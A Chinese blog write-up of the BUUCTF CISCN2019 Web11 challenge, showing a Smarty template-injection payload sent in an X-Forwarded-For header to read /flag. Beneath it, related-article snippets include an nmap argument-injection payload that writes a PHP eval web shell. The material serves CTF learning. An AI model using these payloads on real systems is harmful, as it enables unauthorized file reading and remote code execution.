首页 > 其他分享 >BUUCTF [CISCN2019 华东南赛区]Web11

BUUCTF [CISCN2019 华东南赛区]Web11

时间:2023-09-04 12:23:38浏览次数:48  
标签:BUUCTF Smarty Web11 https CISCN2019 php

切入点如图:

测试模板注入

最后

或者payload:X-Forwarded-For:{if readfile('/flag')}{/if}
原理是Smarty已经废弃{php}标签。在Smarty 3.1,{php}仅在SmartyBC中可用。
Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}。全部的PHP条件表达式和函数都可以在if内使用,如||,or,&&,and,is_array(), 等等。




参考链接:
https://blog.csdn.net/devilare/article/details/119349664
https://www.cnblogs.com/rabbittt/p/13292242.html

标签:BUUCTF,Smarty,Web11,https,CISCN2019,php
From: https://www.cnblogs.com/darkcyan/p/17676592.html

相关文章

  • BUUCTF [网鼎杯 2020 朱雀组]Nmap
    payload:127.0.0.1|'<?=@eval($_POST["hack"]);?>-oGhack.phtml'nmap`-oG`:将扫描结果输出到一个文本文件中,G代表生成一种称为"grepableoutput"(可用于grep命令的输出)的格式,这种格式是一种易于处理的文本格式。写入`hack.phtml`而不是`hack.php`的原因在于php可能被过......
  • BUUCTF [BUUCTF 2018]Online Tool
    首先访问网站得到需要分析的代码<?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highlight_file(__FILE__);}else{$hos......
  • BUUCTF [安洵杯 2019]easy_web
    试试模板注入发现,不行,然后伪协议,不行,再爆破目录也不行。从?img=TXpVek5UTTFNbVUzTURabE5qYz0入手,可能是base64编码。base64解码:(不知道为什么别的WP上变成这样了,否则解不出来)TXpVek5UTTFNbVUzTURabE5q得到:MzUzNTM1MmU3MDZlNj再base64解码:MzUzNTM1MmU3MDZl得到:353535......
  • BUUCTF [GWCTF 2019]我有一个数据库
    文件包含漏洞,和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时......
  • Bugku-Web11
    没啥思路,在这个网站上不能右键弹出属性框,F12查看也没啥可看的,所以就去看了看评论,大概的套路有了,就只有实践了先安装dirsearch:https://github.com/maurosoria/dirsearch进入GitHub下载zip包,我拖到了kali里面安装,因为在wndows中解压输入命令就弹出dirsearch.py的文本文件,做完......
  • BUUCTF [极客大挑战 2019]HardSQL
    判断过滤哪些关键词和字符报错注入报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导致主键重复xpa......
  • BUUCTF [HCTF 2018]admin
    寻找破解知识点方法1-Flasksession伪造首先,先注册一个再登录,在changepassword那里查看源码,可以看到有提示:原链接已经404,看的这一个https://github.com/Wkh19/hctf_flask这是一个flask模板,这样来看,这是一道模板注入类型的题目。Session机制详解session可以在此处查看......
  • BUUCTF [强网杯 2019]随便注
    判断传参方式,输入1'or1=1,URL传参,所以是get。报错error1064:YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMariaDBserverversionfortherightsyntaxtousenear'''atline1报错说明后端参数后面有可能存在其他sql语句,我们......
  • CTFer成长记录——CTF之Web专题·buuctf—Cookies
    一、题目链接https://ctf.bugku.com/challenges/detail/id/87.html?id=87&二、解法步骤  打开网页,发现自动给url上了参数:, line的值为空,filename是base64加密格式,解密后为:key.txt。  首先尝试更改line=1,、2、3、4;发现无反应,然后尝试访问用filename访问index.php。因为直......
  • CTFer成长记录——CTF之Web专题·buuctf—admin
    一、题目链接https://buuoj.cn/challenges#[HCTF%202018]admin二、解法步骤  本题页面十分简单,  在源代码中发现:  猜测需要用admin进行登陆,如果在注册模块用admin进行注册的话,会提示已被注册,那么可以肯定与admin有关。  在登陆页面用弱口令试试,发现不行。  那么......